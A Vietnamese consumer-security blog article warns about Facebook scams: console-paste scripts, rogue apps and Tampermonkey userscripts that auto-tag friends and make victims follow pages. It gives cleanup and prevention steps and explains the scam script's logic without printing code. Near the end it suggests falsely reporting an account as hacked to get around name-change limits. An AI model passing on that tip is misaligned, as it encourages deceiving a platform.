By : Trần Khánh
Tại sao bạn dính bẫy tự động Tag bạn bè trên Facebook?
(Nguồn bài viết GenK.vn) Những hình thức như đổi tên không giới hạn, vẽ chibi miễn phí, hay là một hình thức quảng cáo nào đó tương tự,… đều là những trò lừa đảo hiện nay. Nói một cách thực tế nếu bạn muốn tất cả bạn bè ức chế tới mức Unfriend thì có thể không đọc bài này.
Bạn đang sử dụng facebook, bỗng nhiên bạn không hiểu từ đâu mà nhiều fanpage lạ hoắc, nhiều người lạ xuất hiện trên trang New Feed của bạn. Vậy đâu là nguyên nhân? Và giải quyết như thế nào?
Đây là vấn đề rất phổ biến hiện nay. Để đánh giá mức độ nổi tiếng của một trang cá nhân, hay một trang nào đó, “Like” và “Follower” được xem như thước đo để đánh giá mức độ này. Do đó, để tăng lượt Like, tăng View, tăng Subscriber (hay follower),… kẻ xấu đã dùng nhiều chiêu thức khiến người dùng tự biến mình thành nạn nhân để bị lợi dụng. Bên cạnh những cá nhân chân chính cũng có những cá nhân “bất chính” bày ra không ít mánh khóe lừa gạt người sử dụng.
Các chiêu thức thường sử dụng
– Chiêu thức 1: thực thi một đoạn mã để sử dụng một chức năng gì đó
Bạn muốn đổi tên facebook khi đã hết số lượt đổi, bạn muốn biết ai thường xuyên ghé thăm bạn nhiều nhất, bạn muốn xuất hiện những biểu tượng comment tuyệt vời trên facebook, hoặc thậm chí bạn muốn được vẽ chibi miễn phí,… Bạn tìm kiếm trên mạng và tìm ra một hướng dẫn như thế này.

Một hình thức lừa đảo đánh vào tâm lý người dùng
Đầu tiên bạn click vào liên kết, họ yêu cầu bạn copy một đoạn mã (Script) rất dài.

Sau đó paste vào trình duyệt web (bằng cách bấm nút F12, hay tổ hợp phím Ctrl+Shift+J đối với Chrome, Ctrl+Shift+K với Firefox,…) để thực thi chức năng.

Chỉ cần nhấn một phím Enter, bạn đã bị “dính bẫy” của họ. Mục đích chính của những kẻ xấu này chỉ để tăng Like, tăng Subscriber mà thôi. Bạn sẽ gặp rất nhiều rắc rối: tự động tag hàng loạt bạn bè của mình vào những dòng comment (bình luận) với nội dung nhảm, chỉ mang tính quảng cáo. Mà chẳng có thể đổi tên được gì hết.

Hàng loạt người dùng đã bị tag vào comment.

Trên New Feed cũng xuất hiện nhiều người lạ,…
Hiện nay, nếu bạn chạy những đoạn mã này trên Chrome, Chrome sẽ cảnh báo cho bạn biết để tránh bị “dính bẫy”. Người viết đã thử qua Firefox và rất tiếc Firefox không có cảnh báo nào.

– Chiêu thức 2: chạy ứng dụng
Có vẻ như bạn rất thích những nội dung này: “Top 5 người thường xuyên theo dõi facebook của bạn”, “top 10 người gửi tin nhắn nhiều nhất cho bạn”, bói tính cách,… Lợi dụng tâm lý này, người dùng dễ bị “lừa” bởi những ứng dụng. Nếu may mắn, ứng dụng đó chỉ đơn thuần thống kê danh sách cho bạn, nhưng “không may”, New Feed sẽ tràn ngập những người lạ, những page lạ, nhiều hình ảnh phản cảm,…

Thỉnh thoảng bạn sẽ bắt gặp những nội dung như thế này
Thông thường, muốn sử dụng ứng dụng đó, bạn click vào đường link của ứng dụng, một trang web sẽ hiện ra và yêu cầu bạn làm theo hướng dẫn. Trước tiên, họ bắt bạn Like trang đó, sau đó để cho bạn đợi một chút để ứng dụng thống kê. Trong khoảng thời gian chờ đợi này chính là lúc họ “làm bẩn” facebook của bạn.

Đằng sau những hướng dẫn này là những đoạn mã JavaScript đã được đính kèm. Nếu đơn thuần thì đoạn mã sẽ tự động thêm bạn vào một Group, like 1 Fanpage hay follow một người nào đó mà bạn không biết.

Ứng dụng sẽ sử dụng một số thông tin cá nhân của bạn. Nếu bạn thấy ứng dụng đó sử dụng quá nhiều thông tin, bạn hãy cẩn thận.
Tệ hại hơn, có những kẻ xấu muốn lợi dụng để phát tán virus, hay chúng muốn gài virus để hack tài khoản của bạn. Chúng sử dụng chiêu thức này để lợi dụng. Vậy làm sao để bạn biết được bạn đã tự tay thực thi mã độc trên máy của mình? Câu trả lời sẽ có ở cuối bài viết/

Thông qua ứng dụng, đây là một hình thức “lợi dụng” cao hơn so với việc yêu cầu bạn tự tay copy đoạn mã, lần này đoạn mã sẽ tự động chạy mà không hỏi ý kiến bạn, và nó không có bị chặn lại bởi Chrome.
Bạn cũng cần lưu ý, không phải tất cả các ứng dụng đều làm vậy, một số ứng dụng chỉ mang tính chất thống kê hay chỉ để giải trí là chủ yếu, chứ không có mục đích gì khác.
– Chiêu thức 3: Cài đặt thêm plugin, add-on, extension cho trình duyệt

Cùng một nội dung, nhưng hình thức đã hình đổi đi
Đây là một chiêu thức mới hơn, tinh vi hơn, khắc phục được “nhược điểm của chiêu thức 1”. Đối với chiêu thức này, khi bạn bấm vào một link, thay vì yêu cầu bạn copy đoạn mã vào trong trình duyệt, thì nó sẽ dẫn bạn đến trang cài đặt add-on cho Firefox hay Extension cho Chrome.

Bạn sẽ được yêu cầu cài thêm tiện ích Tampermonkey.
Bạn bấm Add, tiện ích bổ sung sẽ tự động cài đặt vào trình duyệt của bạn. Sau đó, bạn tiếp tục theo hướng dẫn, mở link thứ 2. Tự động sẽ có thông báo “Bạn có muốn tếp tục thực thi đoạn mã để đổi tên không”? Thế là bạn bấm Yes.

Và bạn lại bị “dính bẫy”.

Bạn vào mục Friend trên tường (Timeline) của bạn, bạn xem nhóm Follow và bạn sẽ thấy những người rất lạ.
– Chiêu thức khác
Thỉnh thoảng, bạn sẽ bắt gặp trong nhiều bình luận dưới những các status, các post,… hướng dẫn cách hack tiền mạng Viettel, Mobiphone… bằng cách gửi mã số thẻ cào (hoặc một tin khuyến mãi nào đó).

Thực tế bạn sẽ không bị Like, bị Follow những người bạn lạ, nhưng số tiền mua thẻ cào sẽ rơi vào tay những kẻ lừa gạt, trong khi bạn chẳng có được gì hết.
Cách giải quyết
Nếu chẳng may bạn bị “dính chưởng”, vậy làm cách nào để giải quyết vấn đề?
1) Dựa vào Activity Log
Mọi hoạt động trên của bạn sẽ được ghi lại vào Activity Log. Dựa vào đây, bạn sẽ thấy bất ngờ “sao mà mình like, follow nhiều vậy?” Bạn hãy lần lượt Unlike từng tấm hình, gỡ bỏ các tag,… để tránh bị phiền phức sau này.

Nếu bạn thấy hình ảnh lạ (hay một liên kết, status lạ,…), bạm bấm Unlike để hủy Like tấm hình đó.
2) Gỡ bỏ các ứng dụng
Nếu chẳng may bạn đã chạy một ứng dụng “bẩn”, bên cạnh việc xóa các post của chúng trên Timeline (hay trong Activity Log) bạn cũng cần xóa các app trong Settings.

Bạn vào Settings của facebook, chọn Apps. Tại đây, các ứng dụng mà bạn đã sử dụng sẽ liệt kê, và công việc còn lại là gỡ bỏ từng ứng dụng “bẩn”.
3) Hủy theo dõi (unfollow) những người lạ, fanpage
Bạn vào mục Friend trên tường của bạn, tại nhóm Following (Đang theo dõi), bạn tiến hành Unfollow từng người trong nhóm People.

Đối với fanpage, thật không may, bạn không thể làm trực tiếp như nhóm People được mà bạn phải mở từng fanpage, sau đó Unfollow từng trang. Để thao tác nhanh hơn, bạn hãy mở thêm một thẻ mới bằng cách bấm vào tên page bằng cuộn lăn ở giữa của con chuột. Rồi bạn unfollow từng trang, đóng từng tab (thay vì phải click vào để trình duyệt load đến page đó, sau đó bạn lại quay về rồi load tiếp trong cùng một tab).

Công việc này sẽ đòi hỏi tính kiên nhẫn của bạn nếu bạn bị dính quá nhiều Group, Page lạ.
4) Kiểm tra lại các tiện ích bổ sung của trình duyệt
Nếu chẳng may bạn lỡ cài nhầm một tiện ích nào đó, bạn hãy nhanh chóng gỡ nó ra ngay. Để tránh tình trạng các tiện ích này tự động chạy những đoạn mã “bẩn”.

Gỡ tiện ích “bẩn” Tampermonkey
5) Xóa rác, reset
Công việc cuối cùng, để giải quyết hết mọi “tàn tích” do ứng dụng, các tiện ích “bẩn” còn lại, bạn hãy xoá hết rác, lịch sử của trình duyệt. Sau đó bạn tiến hành reset để khôi phục lại mọi thứ trở về mặc định.

Đối với Chrome, bạn vào Settings của trình duyệt, chọn Show Advanced Settings, bấm nút Reset Browser Settings.

Đối với Firefox, bạn bấm Menu Firefox, chọn Help, chọn Troubleshooting Information, sau đó bấm Reset Firefox.

Đối với Internet Explorer, bạn bấm vào Internet Options, sau đó bạn chuyển vào thẻ Advanced và bấm nút Reset.
Cách đề phòng
Bên cạnh biết được nguyên nhân, bạn cũng cần biết một số cách để đề phòng, tránh bị dính những tình huống như thế này.
1) Cài trình diệt virus
Bạn sẽ thắc mắc một điều là cài trình diệt virus thì có tác dụng gì không? Hầu hết các trình diệt virus đều có tính năng kiểm tra các liên kết. Nếu phát hiện một liên kết có chứa virus, hay chứa một mối nguy hiểm nào đó. Trình diệt virus sẽ chặn lại liên kết đó và cảnh báo cho bạn biết nếu thực thi ứng dụng đó, máy bạn có thể sẽ bị dính virus. Bản thân người viết cũng đã nhận được cảnh báo như vậy nhờ chương trình BitDefender.

Một chương trình chống virus mạnh mẽ sẽ giúp bạn phát hiện những đường link không an toàn.
2) Kiểm soát việc tag
Để tránh bị tag lung tung, trong facebook có một thiết lập giúp bạn kiểm soát những gì mà bạn đã tag (ngoại trừ bạn bị tag trong các comment). Bạn truy cập vào Settings của facebook, tại mục Timeline and Tagging, bạn hãy chuyển ON tại dòng “Review tags people add to your own posts before the tags appear on Facebook”.

Sau này, mỗi lần ai đó tag bạn vào (thậm chí là tự động tag), facebook cũng sẽ hỏi ý kiến bạn.
3) Kiểm soát Activity Log
Mọi hoạt động trên Facebook của bạn đều được ghi lại trong Activity Log. Nếu bạn thấy có một điều gì đó khác lạ: bạn Like một Group lạ hoắc, theo dõi những người mà bạn không hề biết,… Chắc chắn bạn đã bị dính “bẫy”. Lúc này, bạn hãy rà soát lại trước đó bạn có chơi ứng dụng nào không, hay đã bấm nhầm liên kết nào đó,… Và nhanh chóng gỡ bỏ nó ra.

Những FanPage quảng cáo
4) Cẩn thận những lời mời App, spam link
Một khi bạn click vào một liên kết nào đó, nếu facebook nghi ngờ đây là liên kết không an toàn. Facebook sẽ hỏi bạn đây là liên kết có spam không?

Đây cũng là dấu hiệu rất quan trọng để giúp bạn xác định đó có phải là cái “bẫy” của kẻ xấu không. Bởi quá nhiều người truy cập đường link này, facebook sẽ nghi ngờ đây là spam, tức liên kết đó không an toàn.
Bạn cũng đừng quá tin tưởng vào những lời mời chơi ứng dụng từ bạn bè. Rất có thể đó là những ứng dụng không an toàn.
5) Cẩn thận với các hướng dẫn
Như bạn đã thấy, đa số kẻ xấu đều lợi dụng tâm lý người dùng để cài bẫy. Bạn cần phải cẩn thận, không nên click vào những ứng dụng lạ, những liên kết không an toàn, không nên làm theo các hướng dẫn mà không có căn cứ,…
“Lật tẩy” chiêu trò lừa đảo
Người viết sẽ giúp bạn phân tích một chút về đoạn mã để “vạch trần” chiêu lừa đảo này. Hầu hết các đoạn mã đều được viết bằng JavaScript. Tuy nhiên bạn đừng nản vì đoạn mã sao mà … dài quá, bạn chỉ cần chú ý vài điểm như sau.
Trước tiên, họ yêu cầu bạn click vào liên kết này. Vậy bản chất của liên kết này như thế nào?
Sau khi bạn copy, dán đoạn mã theo hướng dẫn của chúng thì quá trình GET. Vậy chúng lấy cái gì?

Chúng lấy thông tin và quá trình tag bạn bè bắt đầu.
Bạn có thể nhìn thấy facebook của “chủ mưu” ở đoạn đầu của phần mã.

Bạn dễ dàng nhìn thấy link facebook của chủ mưu
Kéo xuống một tí nữa, bạn sẽ thấy danh sách ID những người, những page mà bạn sẽ Follow sau khi bạn chạy đoạn mã.

Mỗi ID sẽ có 15 kí tự, do đó cứ chỗ nào bạn thấy có 15 kí tự thì đó là ID của tài khoản.
Nếu bạn thay thế dãy ID này vào link https://www.facebook.com/profile.php?id=[15 kí tự] thì trình duyệt sẽ hiển thị các tài khoản có liên quan.

Tài khoản có ID 270969653047835

Tài khoản có ID 1000004044068515. Bạn cũng để ý là tài khoản này có số lượng follow rất nhiều.
Và đây là đoạn mã Follow, Add Friend, thêm Comment,… (bạn có thể sử dụng tính năng Tìm kiếm để tìm các từ khóa như follow, comment).


Và câu hỏi cuối cùng là bạn có thể đổi tên được không? Câu trả lời là không, bạn đã bị lừa.

Chúng chỉ gửi yêu cầu kết bạn, chứ chẳng có đổi tên gì hết.
Đến đây thôi, bạn đã nhìn ra được “bản chất” của đoạn mã này là để lấy ID của mỗi tài khoản của tất cả mọi người trong friendlist bạn, sau đó tag vào, cho theo dõi, tự động Like, Follow,…
Ngoài ra, còn rất nhiều đoạn mã phức tạp ở phía dưới nữa. Người viết chỉ phân tích cho các bạn thấy vài điều đơn giản để bạn không phải là nạn nhân của chúng. Những đoạn mã này cũng có thể can thiệp vào cookie và cache của trình duyệt nữa để lấy mật khẩu,… và nhiều hình thức khác.
– Cách đổi tên facebook an toàn
Nhân tiện người viết cũng sẽ hướng dẫn một cách giúp bạn đổi tên nếu bạn muốn đảm bảo an toàn.
Khi đã vượt quá số lần giới hạn để đổi tên, bạn có 2 cách như sau:
– Bạn thông báo với facebook là tài khoản của bạn bị hack. Facebook sẽ cấu hình lại tài khoản, cho phép bạn đổi tên, đổi mật khẩu. Nhưng cách này chỉ làm được 1 – 2 lần.

Ngoài ra còn một cách để đổi tên, đó là yêu cầu Facebook xác nhận tên đúng của mình thông qua bản scan CMND, hoặc bất cứ giấy tờ tùy thân nào mang tên thật của bạn. Với cách này bạn sẽ đổi tên được nhưng tên sẽ giống như trên CMND vậy.
Với bài viết này, chắc hẳn bạn đã biết được những nguyên nhân, đồng thời tìm được giải pháp khắc phục và cách phòng trành nững chiêu thức lừa đảo – vốn đang “tung hoành” rất nhiều trên facebook. Công nghệ càng phát triển, các chiêu thức ngày càng tinh vi hơn, cho nên đòi hỏi người dùng phải thường xuyên cảnh giác trước những trò lừa đảo như thế nào.
Đăng ký:
Nhận xét (Atom)



